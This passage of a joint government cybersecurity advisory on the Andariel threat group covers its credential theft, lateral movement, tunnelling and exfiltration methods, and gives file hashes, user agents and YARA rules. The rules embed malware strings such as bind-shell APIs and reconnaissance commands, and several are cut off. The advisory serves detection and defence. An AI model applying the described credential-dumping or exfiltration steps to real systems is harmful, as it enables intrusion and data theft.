The actors employ a multi-pronged approach to stealing credentials to gain additional access to systems, including the use of publicly available credential theft tools such as Mimikatz, ProcDump, and Dumpert and accessing the Active Directory domain database through targeting of the NTDS.dit
file. The authoring agencies assess the actors change settings on compromised systems to force the system to store credentials and then use the aforementioned tools to steal credentials. In one instance, the actors used the vssadmin
command-line utility to back up a volume to retrieve a copy of the NTDS.dit
file containing Active Directory data. In another instance, the actors were observed collecting registry hive data for offline extraction of credentials [T1003].
Discovery
The actors used customized file system enumeration tooling written in .NET. The tool is capable of receiving and executing command line arguments to enumerate directories and files and compress output files. The tool collects the following information for each drive targeted on a system: depth relative to starting path, name, last write time, last access time, creation time, size, and attributes [T1087, T1083].
The actors also enumerate directories and files of connected devices using Server Message Block (SMB) protocol, which enables network file sharing and the ability to request services and programs from a network [T1021.002].
Lateral Movement
The actors also use system logging for discovery to move laterally. The group logs active window changes, clipboard data, and keystrokes and saves the collected logging information to the %Temp%
directory.
The actors have also used Remote Desktop Protocol (RDP) to move laterally [T1021].
Command and Control
The actors leverage techniques and infrastructure positioned around the world to send commands to compromised systems. The actors disguise their malware within HTTP packets to appear as benign network traffic. They also use tunneling tools such as 3Proxy, PLINK, and Stunnel as well as custom proxy tunneling tools to tunnel traffic over a variety of protocols from inside a network back to a C2 server. Tunneling enables the actors to perform C2 operations despite network configurations that would typically pose a challenge, such as the use of Network Address Translation (NAT) or traffic funneled through a web proxy [T1090, T1071].
Collection and Exfiltration
Malware previously used by the actors permitted placement and access to search through files that could be of interest, including scanning computer files for keywords related to defense and military sectors in English and Korean. The actors identify data for theft by enumerating files and folders across many directories and servers using command-line activity or functionality built into custom tools. The actors collect the relevant files into RAR archives, sometimes using a version of WinRAR brought into the victim’s environment with other malicious tooling [T1560, T1039].
The actors typically exfiltrate data to web services such as cloud storage or servers not associated with their primary C2. Notably, the actors have been observed logging into actor-controlled cloud-based storage service accounts directly from victim networks to exfiltrate data [T1567]. The actors have also been observed using the utilities PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via File Transfer Protocol (FTP) and other protocols [T1048].
The actors have also been identified staging files for exfiltration on victim machines, establishing Remote Desktop Protocol connections, and conducting HTTP GET
requests on port 80
to receive information [T1021].
Indicators of Compromise
See below for Andariel IOCs.
The following include observed MD5 hashes:
- 88a7c84ac7f7ed310b5ee791ec8bd6c5
- 6ab4eb4c23c9e419fbba85884ea141f4
- 97ce00c7ef1f7d98b48291d73d900181
- 079b4588eaa99a1e802adf5e0b26d8aa
- 0873b5744d8ab6e3fe7c9754cf7761a3
- 0d696d27bae69a62def82e308d28857a
- 0ecf4bac2b070cf40f0b17e18ce312e6
- 17c46ed7b80c2e4dbea6d0e88ea0827c
- 1f2410c3c25dadf9e0943cd634558800
- 2968c20a07cfc97a167aa3dd54124cda
- 33e85d0f3ef2020cdb0fc3c8d80e8e69
- 4118d9adce7350c3eedeb056a3335346
- 4aa57e1c66c2e01f2da3f106ed2303fa
- 58ad3103295afcc22bde8d81e77c282f
- 5c41cbf8a7620e10f158f6b70963d1cb
- 61a949553d35f31957db6442f36730c5
- 72a22afde3f820422cfdbba7a4cbabde
- 84bd45e223b018e67e4662c057f2c47e
- 86465d92f0d690b62866f52f5283b9fc
- 8b395cc6ecdec0900facf6e93ec48fbb
- 97f352e2808c78eef9b31c758ca13032
- a50f3b7aa11b977ae89285b60968aa67
- afd25ce56b9808c5ed7eade75d2e12a7
- afdeb24975a318fc5f20d9e61422a308
- b697b81b341692a0b137b2c748310ea7
- bcac28919fa33704a01d7a9e5e3ddf3f
- c027d641c4c1e9d9ad048cda2af85db6
- c892c60817e6399f939987bd2bf5dee0
- cdeae978f3293f4e783761bc61b34810
- d0f310c99476f1712ac082f78dd29fdc
- d8da33fae924b991b776797ba8cde24c
- e230c5728f9ea5a94e390e7da7bf1ffa
- f4d46629ca15313b94992f3798718df7
- fb84a392601fc19aeb7f8ce11b3a4907
- ff3194d3d5810a42858f3e22c91500b1
- 13b4ce1fc26d400d34ede460a8530d93
- 41895c5416fdc82f7e0babc6bb6c7216
- c2f8c9bb7df688d0a7030a96314bb493
- 33a3da2de78418b89a603e28a1e8852c
- 4896da30a745079cd6265b6332886d45
- 73eb2f4f101aab6158c615094f7a632a
- 7f33d2d2a2ce9c195202acb59de31eee
- e1afd01400ef405e46091e8ef10c721c
- fe25c192875ec1914b8880ea3896cda2
- 232586f8cfe82b80fd0dfa6ed8795c56
- c1f266f7ec886278f030e7d7cd4e9131
- 49bb2ad67a8c5dfbfe8db2169e6fa46e
- beb199b15bd075996fa8d6a0ed554ca8
- 4053ca3e37ed1f8d37b29eed61c2e729
- 3a0c8ae783116c1840740417c4fbe678
- 0414a2ab718d44bf6f7103cff287b312
- ca564428a29faf1a613f35d9fa36313f
- ad6d4eb34d29e350f96dc8df6d8a092e
- dc70dc9845aa747001ebf2a02467c203
- 3d2ec58f37c8176e0dbcc47ff93e5a76
- 0a09b7f2317b3d5f057180be6b6d0755
- 1ffccc23fef2964e9b1747098c19d956
- 9112efb49cae021abebd3e9a564e6ca4
- ac0ada011f1544aa3a1cf27a26f2e288
- 0211a3160cc5871cbcd4e5514449162b
- 7416ea48102e2715c87edd49ddbd1526
- a2aefb7ab6c644aa8eeb482e27b2dbc4
- e7fd7f48fbf5635a04e302af50dfb651
- 33b2b5b7c830c34c688cf6ced287e5be
- e5410abaaac69c88db84ab3d0e9485ac
- eb35b75369805e7a6371577b1d2c4531
- 5a3f3f75048b9cec177838fb8b40b945
- 9d7bd0caed10cc002670faff7ca130f5
- 8434cdd34425916be234b19f933ad7ea
- bbaee4fe73ccff1097d635422fdc0483
- 79e474e056b4798e0a3e7c60dd67fd28
- 95c276215dcc1bd7606c0cb2be06bf70
- 426bb55531e8e3055c942a1a035e46b9
- cfae52529468034dbbb40c9a985fa504
- deae4be61c90ad6d499f5bdac5dad242
- bda0686d02a8b7685adf937cbcd35f46
- 6de6c27ca8f4e00f0b3e8ff5185a59d1
- c61a8c4f6f6870c7ca0013e084b893d2
- 5291aed100cc48415636c4875592f70c
- f4795f7aec4389c8323f7f40b50ae46f
- cf1a90e458966bcba8286d46d6ab052c
- 792370eb01e16ac3dc511143932d0e1d
- 612538328e0c4f3e445fb58ef811336a
- 9767aa592ec2d6ae3c7d40b6049d0466
- b22fd0604c4f189f2b7a59c8f48882dd
- e53ca714787a86c13f07942a56d64efa
- c7b09f1dd0a5694de677f3ecceda41b7
- c8346b39418f92725719f364068a218d
- 730bff14e80ffd7737a97cdf11362ab5
- 9a481bc83fea1dea3e3bdfff5e154d44
- ddb1f970371fa32faae61fc5b8423d4b
- 6c2b947921e7c77d9af62ce9a3ed7621
- 977d30b261f64cc582b48960909d0a89
- 7ce51b56a6b0f8f78056ddfc5b5de67c
- dd9625be4a1201c6dfb205c12cf3a381
- ecb4a09618e2aba77ea37bd011d7d7f7
- 0fd8c6f56c52c21c061a94e5765b27b4
- c90d094a8fbeaa8a0083c7372bfc1897
- 0055a266aa536b2fdadb3336ef8d4fba
- 55bb271bbbf19108fec73d224c9b4218
- 0c046a2f5304ed8d768795a49b99d6e4
- f34664e0d9a10974da117c1ca859dba8
- a2c2099d503fcc29478205f5aef0283b
- e439f850aa8ead560c99a8d93e472225
- 7c30ed6a612a1fd252565300c03c7523
- 81738405a7783c09906da5c7212e606b
- c027d641c4c1e9d9ad048cda2af85db6
- eb7ba9f7424dffdb7d695b00007a3c6d
- 3e9ee5982e3054dc76d3ba5cc88ae3de
- 073e3170a8e7537ff985ec8316319351
- 9b0e7c460a80f740d455a7521f0eada1
- 2d02f5499d35a8dffb4c8bc0b7fec5c2
- 0984954526232f7d05910aa5b07c5893
- 4156a7283284ece739e1bae05f99e17c
- 3026d419ee140f3c6acd5bff54132795
- 7aa132c0cc63a38fb4d1789553266fc7
- 1a0811472fad0ff507a92c957542fffd
- f8aef59d0c5afe8df31e11a1984fbc0a
- 82491b42b9a2d34b13137e36784a67d7
- 0a199944f757d5615164e8808a3c712a
- 9c97ea18da290a6833a1d36e2d419efc
- 16f768eac33f79775a9672018e0d64f5
The following include observed SHA-256 hashes:
- ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6
- db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984
- 773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df
- 05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d
- e3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe
- 1962ebb7bf8d2b306c6f3b55c3dcd69a755eeff1a17577b7606894b781841c3a
- f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb
- 6db57bbc2d07343dd6ceba0f53c73756af78f09fe1cb5ce8e8008e5e7242eae1
- b7435d23769e79fcbe69b28df4aef062685d1a631892c2354f96d833eae467be
- 66415464a0795d0569efa5cb5664785f74ed0b92a593280d689f3a2ac68dca66
- def2f01fbd4be85f48101e5ab7ddd82efb720e67daa6838f30fd8dcda1977563
- 323cbe7a3d050230cfaa822c2a22160b4f8c5fe65481dd329841ee2754b522d9
- 74529dd15d1953a47f0d7ecc2916b2b92865274a106e453a24943ca9ee434643
- 1e4de822695570421eb2f12fdfe1d32ab8639655e12180a7ab3cf429e7811b8f
- 8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5
- c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f
- dda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469
- 90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4
- 452ca47230afd4bb85c45af54fcacbfa544208ef8b4604c3c5caefe3a64dcc19
- 199ba618efc6af9280c5abd86c09cdf2d475c09c8c7ffc393a35c3d70277aed1
- 2eb16dbc1097a590f07787ab285a013f5fe235287cb4fb948d4f9cce9efa5dbc
- ce779e30502ecee991260fd342cc0d7d5f73d1a070395b4120b8d300ad11d694
- db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984
- c28bb61de4a6ad1c5e225ad9ec2eaf4a6c8ccfff40cf45a640499c0adb0d8740
- 34d5a5d8bec893519f204b573c33d54537b093c52df01b3d8c518af08ee94947
- 664f8d19af3400a325998b332343a9304f03bab9738ddab1530869eff13dae54
- 772b06f34facf6a2ce351b8679ff957cf601ef3ad29645935cb050b4184c8d51
- aa29bf4292b68d197f4d8ca026b97ec7785796edcb644db625a8f8b66733ab54
- 9a5504dcfb7e664259bfa58c46cfd33e554225daf1cedea2ec2a9d83bbbfe238
- c2500a6e12f22b16e221ba01952b69c92278cd05632283d8b84c55c916efe27c
- 8aa6612c95c7cef49709596da43a0f8354f14d8c08128c4cb9b1f37e548f083b
- 38f0f2d658e09c57fc78698482f2f638843eb53412d860fb3a99bb6f51025b07
The following include a list of user agent strings used by the actors:
- Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
- Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
- Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
- Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
- Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
- Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
- Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
- Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
- Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
- Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Detection Methods
See Table 2 for YARA rules, created by the FBI, authoring partners, and private industry, that can be used to detect malware used by the actors.
rule Andariel_ScheduledTask_Loader { strings: $obfuscation1 = { B8 02 00 00 00 48 6B C0 00 B9 CD FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 01 B9 CC FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 02 B9 8D FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 03 B9 9A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 04 B9 8C FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 05 B9 8A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 06 33 C9 66 89 8C 04 60 01 00 00 } $obfuscation2 = { 48 6B C0 02 C6 44 04 20 BA B8 01 00 00 00 48 6B C0 03 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 04 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 05 C6 44 04 20 8A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 9C B8 01 00 00 00 } $obfuscation3 = { 48 6B C0 00 C6 44 04 20 A8 B8 01 00 00 00 48 6B C0 01 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 02 C6 44 04 20 93 B8 01 00 00 00 48 6B C0 03 C6 44 04 20 96 B8 01 00 00 00 48 6B C0 04 C6 44 04 20 B9 B8 01 00 00 00 48 6B C0 05 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 07 C6 44 04 20 9E B8 01 00 00 00 48 6B C0 08 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 09 C6 44 04 20 8D B8 01 00 00 00 48 6B C0 0A C6 44 04 20 BC B8 01 00 00 00 } condition: uint16(0) == 0x5A4D and $obfuscation1 and $obfuscation2 and $obfuscation3 } |
rule Andariel_KaosRAT_Yamabot { strings: $str1 = “/kaos/” $str2 = “Abstand [” $str3 = “] anwenden” $str4 = “cmVjYXB0Y2hh” $str5 = “/bin/sh” $str6 = “utilities.CIpaddress” $str7 = “engine.NewEgg” $str8 = “%s%04x%s%s%s” $str9 = “Y2FwdGNoYV9zZXNzaW9u” $str10 = “utilities.EierKochen” $str11 = “kandidatKaufhaus” condition: |
rule TriFaux_EasyRAT_JUPITER { strings: $InitOnce = “InitOnceExecuteOnce” $BREAK = { 0D 00 0A 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 0D 00 0A } $Bytes = “4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00,” wide condition: uint16(0) == 0x5a4d and all of them } |
rule Andariel_CutieDrop_MagicRAT { strings: $config_os_w = “os/windows” ascii wide $config_os_l = “os/linux” ascii wide $config_os_m = “os/mac” ascii wide $config_comp_msft = “company/microsoft” ascii wide $config_comp_orcl = “company/oracle” ascii wide $POST_field_1 = “session=” ascii wide $POST_field_2 = “type=” ascii wide $POST_field_3 = “id=” ascii wide $command_misspelled = “renmae” ascii wide condition: uint16(0) == 0x5a4d and 7 of them |
rule Andariel_hhsd_FileTransferTool { strings: // 30 4D C7 xor [rbp+buffer_v41+3], cl // 81 7D C4 22 C0 78 00 cmp dword ptr [rbp+buffer_v41], 78C022h // 44 88 83 00 01 00 00 mov [rbx+100h], r8b $handshake = { 30 ?? ?? 81 7? ?? 22 C0 78 00 4? 88 } // B1 14 mov cl, 14h // 41 02 D0 add dl, r8b |
// B9 8D 10 B7 F8 mov ecx, 0F8B7108Dh // E8 F1 BA FF FF call sub_140001280 $hash_call_loadlib = { B? 8D 10 B7 F8 E8 } $hash_call_unk = { B? 91 B8 F6 88 E8 } condition: uint16(0) == 0x5a4d and (any of ($handshake, $err_xor_str, $buf_add_cmp_1f) and any of ($hash_call_*)) or 2 of ($handshake, $err_xor_str, $buf_add_cmp_1f) |
rule Andariel_Atharvan_3RAT { strings: $3RAT = “D:\rang\TOOL\3RAT” $atharvan = “Atharvan_dll.pdb” condition: uint16(0) == 0x5a4d and any of them } |
rule Andariel_LilithRAT_Variant { strings: // The following are strings seen in the open source version of Lilith $lilith_1 = “Initiate a CMD session first.” ascii wide $lilith_2 = “CMD is not open” ascii wide $lilith_3 = “Couldn’t write command” ascii wide $lilith_4 = “Couldn’t write to CMD: CMD not open” ascii wide // The following are strings that appear to be unique to the Unnamed Trojan based on Lilith $unique_1 = “Upload Error!” ascii wide $unique_2 = “ERROR: Downloading is already running!” ascii wide $unique_3 = “ERROR: Unable to open file:” ascii wide $unique_4 = “General error” ascii wide $unique_5 = “CMD error” ascii wide $unique_6 = “killing self” ascii wide condition: uint16(0) == 0x5a4d and filesize < 150KB and all of ($lilith_*) and 2 of ($unique_*) } |
rule Andariel_SocksTroy_Strings_OpCodes { strings: $strHost = “-host” wide $strAuth = “-auth” wide $SocksTroy = “SocksTroy” $cOpCodeCheck = { 81 E? A0 00 00 00 0F 84 ?? ?? ?? ?? 83 E? 03 74 ?? 83 E? 02 74 ?? 83 F? 0B } condition: uint16(0) == 0x5a4d and ((1 of ($str*)) and (all of ($c*)) or (all of ($Socks*))) } |
rule Andariel_Agni { strings: $xor = { 34 ?? 88 01 48 8D 49 01 0F B6 01 84 C0 75 F1 } $stackstrings = {C7 44 24 [5-10] C7 44 24 [5] C7 44 24 [5-10] C7 44 24 [5-10] C7 44 24} condition: uint16(0) == 0x5a4d and (#xor > 100 and #stackstrings > 5) } |
rule Andariel_GoLang_validalpha_handshake { strings: $ = { 66 C7 00 AB CD C6 40 02 EF ?? 03 00 00 00 48 89 C1 ?? 03 00 00 00 } condition: all of them } |
rule Andariel_GoLang_validalpha_tasks { strings: $ = “main.ScreenMonitThread” $ = “main.CmdShell” $ = “main.GetAllFoldersAndFiles” $ = “main.SelfDelete” condition: all of them } |
rule Andariel_GoLang_validalpha_BlackString { strings: $ = “I:/01___Tools/02__RAT/Black” condition: uint16(0) == 0x5A4D and all of them } |
rule INDICATOR_EXE_Packed_VMProtect { strings: $s1 = “.vmp0” fullword ascii $s2 = “.vmp1” fullword ascii condition: uint16(0) == 0x5a4d and all of them or for any i in (0 .. pe.number_of_sections) : ( ( pe.sections[i].name == “.vmp0” or pe.sections[i].name == “.vmp1” ) ) } |
rule INDICATOR_EXE_Packed_Themida { strings: $s1 = “.themida” fullword ascii condition: uint16(0) == 0x5a4d and all of them or for any i in (0 .. pe.number_of_sections) : ( ( pe.sections[i].name == “.themida” ) ) } |
rule Andariel_elf_backdoor_fipps { strings: $a = “found mac address” $b = “RecvThread” $c = “OpenSSL-1.0.0-fipps” $d = “Disconnected!” condition: (all of them) and uint32(0) == 0x464c457f } |
rule Andariel_bindshell { strings: $str_comspec = “COMSPEC” $str_consolewindow = “GetConsoleWindow” $str_ShowWindow = “ShowWindow” $str_WSASocketA = “WSASocketA” $str_CreateProcessA = “CreateProcessA” $str_port = {B9 4D 05 00 00 89} condition: uint16(0) == 0x5A4D and all of them } |
rule Andariel_grease2 { strings: $str_rdpconf = “c: \windows\temp\RDPConf.exe” fullword nocase $str_rdpwinst = “c: \windows\temp\RDPWInst.exe” fullword nocase $str_net_user = “net user” $str_admins_add = “net localgroup administrators” condition: uint16(0) == 0x5A4D and all of them } |
rule Andariel_NoPineapple_Dtrack_unpacked { strings: $str_nopineapple = “< No Pineapple! >” $str_qt_library = “Qt 5.12.10” $str_xor = {8B 10 83 F6 ?? 83 FA 01 77} condition: uint16(0) == 0x5A4D and all of them } |
rule Andariel_dtrack_unpacked { strings: $str_mutex = “MTX_Global” $str_cmd_1 = “/c net use \\” wide $str_cmd_2 = “/c ping -n 3 127.0.01 > NUL % echo EEE > “%s”” wide $str_cmd_3 = “/c move /y %s \\” wide $str_cmd_4 = “/c systeminfo > “%s” & tasklist > “%s” & netstat -naop tcp > “%s”” wide condition: uint16(0) == 0x5A4D and all of them } |
rule Andariel_TigerRAT_crowdsourced_rule { strings: $m1 = “.?AVModuleKeyLogger@@” fullword ascii $m2 = “.?AVModulePortForwarder@@” fullword ascii $m3 = “.?AVModuleScreenCapture@@” fullword ascii $m4 = “.?AVModuleShell@@” fullword ascii $s1 = “\x9891-009942-xnopcopie.dat” fullword wide $s2 = “(%02d : %02d-%02d %02d:%02d:%02d)— %s[Clipboard]” fullword ascii $s3 = “[%02d : %02d-%02d %02d:%02d:%02d]— %s[Title]” fullword ascii $s4 = “del “%s”%s “%s” goto ” ascii $s5 = “[<<]” fullword ascii condition: uint16(0) == 0x5a4d and (all of ($s*) or (all of ($m*) and 1 of ($s*)) or (2 of ($m*) and 2 of ($s*))) } |
rule win_tiger_rat_auto { strings: $sequence_0 = { 33c0 89442438 89442430 448bcf 4533c0 } // n = 5, score = 200 // 33c0 | jmp 5 // 89442438 | dec eax // 89442430 | mov eax, ecx // 448bcf | movzx eax, byte ptr [eax] // 4533c0 | dec eax $sequence_1 = { 41b901000000 488bd6 488bcb e8???????? } // n = 4, score = 200 // 41b901000000 | dec eax // 488bd6 | mov eax, dword ptr [ecx] // 488bcb | jmp 8 // e8???????? | $sequence_2 = { 4881ec90050000 8b01 8985c8040000 8b4104 } $sequence_3 = { 488b01 ff10 488b4f08 4c8d4c2430 } $sequence_4 = { 488b01 ff10 488b4e18 488b01 } $sequence_5 = { 4881eca0000000 33c0 488bd9 488d4c2432 } $sequence_6 = { 488b01 eb03 488bc1 0fb600 } $sequence_7 = { 488b01 8b10 895124 448b4124 4585c0 } $sequence_8 = { 4c8d0d31eb0000 c1e918 c1e808 41bf00000080 } $sequence_9 = { 488bd8 4885c0 752d ff15???????? 83f857 0f85e0010000 488d0da0bd0000 } $sequence_10 = { 75d4 488d1d7f6c0100 488b4bf8 4885c9 740b } $sequence_11 = { 0f85d9000000 488d15d0c90000 41b810200100 488bcd e8???????? eb6b b9f4ffffff } $sequence_12 = { 48890d???????? 488905???????? 488d05ae610000 488905???????? 488d05a0550000 488905???????? } $sequence_13 = { 8bcf e8???????? 488b7c2448 85c0 0f8440030000 488d0560250100 } $sequence_14 = { ff15???????? 8b05???????? 2305???????? ba02000000 33c9 8905???????? 8b05???????? } $sequence_15 = { 4883ec30 498bd8 e8???????? 488bc8 4885c0 } condition: |
rule win_dtrack_auto { strings: $sequence_0 = { 52 8b4508 50 e8???????? 83c414 8b4d10 51 } // n = 7, score = 400 // 52 | push edx // 8b4508 | mov eax, dword ptr [ebp + 8] // 50 | push eax // e8???????? | // 83c414 | add esp, 0x14 // 8b4d10 | mov ecx, dword ptr [ebp + 0x10] // 51 | push ecx $sequence_1 = { 3a4101 7523 83854cf6ffff02 838550f6ffff02 80bd4af6ffff00 75ae c78544f6ffff00000000 } // n = 7, score = 300 // 3a4101 | cmp al, byte ptr [ecx + 1] // 7523 | jne 0x25 // 83854cf6ffff02 | add dword ptr [ebp – 0x9b4], 2 // 838550f6ffff02 | add dword ptr [ebp – 0x9b0], 2 // 80bd4af6ffff00 | cmp byte ptr [ebp – 0x9b6], 0 // 75ae | jne 0xffffffb0 // c78544f6ffff00000000 | mov dword ptr [ebp – 0x9bc], 0 $sequence_2 = { 50 ff15???????? a3???????? 68???????? e8???????? 83c404 50 } $sequence_3 = { 8d8dd4faffff 51 e8???????? 83c408 8b15???????? } $sequence_4 = { 8855f5 6a5c 8b450c 50 e8???????? } $sequence_5 = { 51 e8???????? 83c410 8b558c 52 } $sequence_6 = { 8b4d0c 51 68???????? 8d9560eaffff 52 e8???????? } $sequence_7 = { 83c001 8945f4 837df420 7d2c 8b4df8 } $sequence_8 = { 83c001 89856cf6ffff 8b8d70f6ffff 8a11 } $sequence_9 = { 0355f0 0fb602 0fb64df7 33c1 0fb655fc 33c2 } $sequence_10 = { d1e9 894df8 8b5518 8955fc c745f000000000 } $sequence_11 = { 8b4df0 3b4d10 0f8d90000000 8b5508 0355f0 0fb602 } $sequence_12 = { 894d14 8b45f8 c1e018 8b4dfc c1e908 0bc1 } $sequence_13 = { 0bc1 894518 8b5514 8955f8 } $sequence_14 = { 8b5514 8955f8 8b4518 8945fc e9???????? 8be5 } condition: |
Mitigation Measures
The authoring agencies recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on the threat actors’ activity.
Log4Shell and Other Log4j Vulnerabilities
Defenders should consult the joint Cybersecurity Advisory titled “Mitigating Log4Shell and Other Log4j-Related Vulnerabilities” and CISA’s “Apache Log4j Vulnerability” guidance. Organizations can mitigate the risks posed by the vulnerability by identifying assets affected by Log4Shell and other Log4j-related vulnerabilities and upgrading Log4j assets and affected products to the latest version.
Note: CVE-2021-44228 ‘Log4Shell’ was disclosed in December 2021 and affects the Log4j library prior to version 2.17.0.
Defenders should remain alert to vendor software updates, and initiate hunt and incident response procedures to detect possible Log4Shell exploitation.
Web Shell Malware
Web shell malware is deployed by adversaries on a victim’s web server to execute arbitrary system commands. The NSA and Australian Signals Directorate’s report titled “Detect and Prevent Web Shell Malware” provides mitigating actions to identify and recover from web shells.
Preventing exploitation of web-facing servers often depends on maintaining an inventory of systems and applications, rapidly applying patches as they are released, putting vulnerable or potentially risky systems behind reverse proxies that require authentication, and deploying and configuring Web Application Firewalls (WAFs).
Endpoint Activity
Preventing and detecting further adversary activity should focus on deploying endpoint agents or other monitoring mechanisms, blocking unnecessary outbound connections, blocking external access to administrator panels and services or turning them off entirely, and segmenting the network to prevent lateral movement from a compromised web server to critical assets.
Command Line Activity and Remote Access
Monitoring for suspicious command-line activity, implementing multi-factor authentication for remote access services, and properly segmenting and using allow-listing tools for critical assets can protect against malicious activity by RGB 3rd Bureau’s Andariel group and other cyber threat actors.
Packing
Signatures for Themida, VMProtect and a number of other packers are available here, however, the signatures will not identify every file packed using these applications.
- Check for security vulnerabilities, apply patches, and update to the latest version of software
- Encrypt all sensitive data including personal information
- Block access to unused ports
- Change passwords when they are suspected of being compromised
- Strengthen the subscriber identity authentication process for leased servers
DPRK Rewards for Justice
The U.S. and ROK Governments encourage victims to report suspicious activities, including those related to suspected DPRK cyber activities, to relevant authorities. If you provide information about illicit DPRK activities in cyberspace, including past or ongoing operations, you may be eligible for a reward. If you have information about illicit DPRK activities in cyberspace, including past or ongoing operations, providing such information through the Department of State’s Rewards for Justice program could make you eligible to receive an award of up to $10 million. For further details, please visit https://rewardsforjustice.net/.
Acknowledgements
Mandiant and Microsoft Threat Intelligence contributed to this CSA.
Disclaimer of Endorsement
Your organization has no obligation to respond or provide information in response to this product. If, after reviewing the information provided, your organization decides to provide information to the authorizing agencies, it must do so consistent with applicable state and federal law.
The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or service by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the co-authors.
Trademark Recognition
Active Directory®, Microsoft®, PowerShell®, and Windows® are registered trademarks of Microsoft Corporation. MITRE® and ATT&CK® are registered trademarks of The MITRE Corporation.
Purpose
This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
Contact
U.S. organizations: Urgently report any anomalous activity or incidents, including based upon technical information associated with this Cybersecurity Advisory, to CISA at Report@cisa.dhs.gov or cisa.gov/report or to the FBI via your local FBI field office listed at https://www.fbi.gov/contact-us/fieldoffices.
DC3 Cyber Forensics Laboratory (CFL): afosi.dc3.cflintake@us.af.mil
DoD-Defense Industrial Base (DIB) Collaborative Information Sharing Environment (DCISE): dc3.dcise@us.af.mil
NSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov
NSA Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov
NSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov
Republic of Korea organizations: If you suspect cyber incidents involving state actors, including Andariel, or discover similar cases, please contact the relevant authorities below.
National Intelligence Service: www.nis.go.kr, +82 111
References
AhnLab Security Emergency Response Center:
Boredhackerblog: http://www.boredhackerblog.info/2022/11/openssl-100-fipps-linux-backdoor-notes.html
Cisco Talos Intelligence blogs:
DCSO blog: https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-dbfe29f57499
Github.com/ditekshen: https://github.com/ditekshen/detection/blob/master/yara/indicator_packed.yar
JPCERT blogs:
Mandiant blogs:
Microsoft blogs:
NSCS Guidance:
Symantec blog: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research
VMware blog: https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html
WithSecure Labs report: https://labs.withsecure.com/publications/no-pineapple-dprk-targeting-of-medical-research-and-technology-sector
Appendix: MITRE ATT&CK Techniques and Software
The tactics and techniques referenced in this advisory are identified in Table 3 – Table 12.
Technique Title | ID | Use |
---|---|---|
Gather Victim Org Information | T1591 | The actors gather information about the victim’s organization that can be used during targeting. |
Gather Victim Host Information | T1592 | The actors gather information about the victim’s hosts that can be used during targeting. |
Active Scanning | T1595 | The actors execute active reconnaissance scans to gather information that can be used during targeting. |
